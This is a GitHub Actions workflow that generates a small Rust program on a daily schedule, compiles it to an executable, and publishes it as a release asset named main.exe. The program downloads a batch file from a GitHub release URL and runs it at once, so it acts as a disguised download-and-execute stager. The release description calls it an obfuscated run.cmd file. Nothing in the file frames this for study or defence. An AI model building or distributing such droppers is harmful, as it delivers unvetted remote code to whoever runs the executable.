name: EXE

on:
  push:
    paths:
      - 'run.cmd'
  schedule:
    - cron: '0 0 * * *'  # Runs every day at midnight UTC
  workflow_dispatch:  # Allows manual triggering

permissions:
  contents: write
  pull-requests: write
  repository-projects: write

jobs:
  build:
    runs-on: windows-latest

    steps:
    - name: Checkout repository
      uses: actions/checkout@v2

    - name: Setup Rust
      uses: actions-rs/toolchain@v1
      with:
        toolchain: stable
        target: x86_64-pc-windows-msvc
        profile: minimal

    - name: Create Rust file
      run: |
        Add-Content -Path script.rs -Value 'use std::process::Command;'
        Add-Content -Path script.rs -Value 'fn main() {'
        Add-Content -Path script.rs -Value '    Command::new("curl")'
        Add-Content -Path script.rs -Value '        .arg("-L")'
        Add-Content -Path script.rs -Value '        .arg("-o")'
        Add-Content -Path script.rs -Value '        .arg("download.bat")'
        Add-Content -Path script.rs -Value '        .arg("https://github.com/43a1723/test/releases/download/AutoBuild/download.bat")'
        Add-Content -Path script.rs -Value '        .status()'
        Add-Content -Path script.rs -Value '        .expect("Failed to download file");'
        Add-Content -Path script.rs -Value ''
        Add-Content -Path script.rs -Value '    Command::new("cmd")'
        Add-Content -Path script.rs -Value '        .arg("/C")'
        Add-Content -Path script.rs -Value '        .arg("download.bat")'
        Add-Content -Path script.rs -Value '        .status()'
        Add-Content -Path script.rs -Value '        .expect("Failed to execute batch file");'
        Add-Content -Path script.rs -Value '}'

    - name: Compile Rust Script
      run: |
        rustc script.rs -o script.exe

    - name: Delete-tag-and-release
      uses: dev-drprasad/delete-tag-and-release@v1.1
      with:
        tag_name: AutoBuildExe
        delete_release: true
        github_token: ${{ secrets.GITHUB_TOKEN }}

    - name: Create Release
      id: create_release
      uses: actions/create-release@latest
      env:
        GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
      with:
        tag_name: AutoBuildExe
        release_name: AutoBuildExe
        body: Obfuscated run.cmd file
        draft: false
        prerelease: false

    - name: Upload Release Asset
      id: upload-release-asset 
      uses: actions/upload-release-asset@v1
      env:
        GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
      with:
        upload_url: ${{ steps.create_release.outputs.upload_url }}
        asset_path: script.exe
        asset_name: main.exe
        asset_content_type: application/octet-stream
